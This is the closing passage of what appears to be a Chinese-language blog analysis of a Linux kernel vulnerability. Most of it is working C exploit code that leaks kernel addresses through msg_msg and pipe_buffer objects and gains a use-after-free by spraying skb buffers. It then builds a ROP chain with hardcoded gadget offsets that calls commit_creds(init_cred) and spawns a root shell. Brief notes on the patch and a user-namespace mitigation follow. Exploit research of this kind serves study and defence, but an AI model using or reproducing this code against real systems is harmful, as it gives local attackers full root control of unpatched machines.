puts("[*] Leaking address of msg_fake");
if (peek_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), 1) < 0)
goto ret;
if (*(int *)&msg_fake.mtext[PAGE_SIZE] != MSG_TAG)
{
printf("[-] Could not leak address of msg_fake\n");
goto ret;
}
msg = (struct msg_msg *)&msg_fake.mtext[PAGE_SIZE - MSG_MSG_SIZE];
msg_fake_addr = msg->m_list_next;
if (msg_fake_addr & (SECONDARY_SIZE - 1))
msg_fake_addr = msg->m_list_prev;
msg_fake_addr -= SECONDARY_SIZE;
printf("[+] address of msg_fake = %#" PRIx64 "\n", msg_fake_addr);
puts("[*] Free secondary message and then gain UAF controlled by skb");
if (free_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
build_msg_msg((struct msg_msg *)secondary_buf, msg_fake_addr, msg_fake_addr, 0, 0);
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
if (read_msg(msqid[fake_id], &msg_fake, sizeof(msg_fake), MTYPE_FAKE) < 0)
goto ret;
puts("[*] Spraying pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (pipe(pipefd[i]) < 0)
{
perror("[-] pipe");
goto ret;
}
if (write(pipefd[i][1], "xi4oyu", 6) < 0)
{
perror("[-] write");
goto ret;
}
}
puts("[*] Leaking and freeing pipe_buffer object...");
for (int i = 0; i < NUM_SOCKETS; i++)
{
for (int j = 0; j < NUM_SKBUFFS; j++)
{
if (read(ss[i][1], secondary_buf, sizeof(secondary_buf)) < 0)
{
perror("[-] read");
goto ret;
}
if (*(uint64_t *)&secondary_buf[0x10] != MTYPE_FAKE)
{
pipe_buffer_ops = *(uint64_t *)&secondary_buf[0x10];
// break; // free all
}
}
}
kernel_offset = pipe_buffer_ops - 0xffffffff8223e140; // anon_pipe_buf_ops
kernel_base = kernel_offset + 0xffffffff81000000;
printf("[+] pipe_buffer_ops = %#" PRIx64 "\n", pipe_buffer_ops);
printf("[+] kernel_base = %#" PRIx64 "\n", kernel_base);
printf("[+] kernel_offset = %#" PRIx64 "\n", kernel_offset);
puts("[*] Spraying fake pipe_buffer...");
memset(secondary_buf, 0, sizeof(secondary_buf));
buf = (struct pipe_buffer *)secondary_buf;
buf->ops = msg_fake_addr + 0x200;
ops = (struct pipe_buf_operations *)&secondary_buf[0x200];
ops->release = kernel_offset + 0xffffffff8172e1ac; // push rsi ; jmp qword ptr [rsi + 0x39]
*(uint64_t *)&secondary_buf[0] = kernel_offset + 0xffffffff8106f8c9; // add rsp, 0xd0 ; ret
*(uint64_t *)&secondary_buf[0x39] = kernel_offset + 0xffffffff81163ea0; // pop rsp ; ret
rop = (uint64_t *)&secondary_buf[0xd0 + 8];
ridx = 0;
rop[ridx++] = kernel_offset + 0xffffffff8108c650; // pop rdi ; ret
rop[ridx++] = kernel_offset + 0xffffffff8286b780; // init_cred
rop[ridx++] = kernel_offset + 0xffffffff810c9f00; // commit_creds
rop[ridx++] = kernel_offset + 0xffffffff8108c5bc; // mov rsp, rbp ; pop rbp ; ret
if (spray_skbuff(ss, secondary_buf, sizeof(secondary_buf)) < 0)
goto ret;
puts("[*] Releasing pipe_buffer objects...");
for (int i = 0; i < NUM_PIPEFDS; i++)
{
if (close(pipefd[i][0]) < 0)
{
perror("[-] close");
goto ret;
}
if (close(pipefd[i][1]) < 0)
{
perror("[-] close");
goto ret;
}
}
getRootShell();
ret:
for (int i = 0; i < NUM_MSQIDS; i++)
{
if (msqid[i] < 0)
continue;
if (msgctl(msqid[i], IPC_RMID, NULL) < 0)
perror("[-] msgctl rmid");
}
return 0;
}
漏洞修复
漏洞的修复很粗暴,就直接把 memset 这部分给去掉了,具体看 patch
还有个缓解措施是,禁用用户命名空间的功能来阻止普通用户拿到 CAP_NET_ADMIN
权限,参考:
echo 0 > /proc/sys/user/max_user_namespaces
总结
从溢出写 0 到 UAF 这里非常的巧妙,随后的 skb 和 pipe_buffer 结合利用 UAF 的思路应该是十分具备参考性的,非常值得学习
文中未明确提到的参考: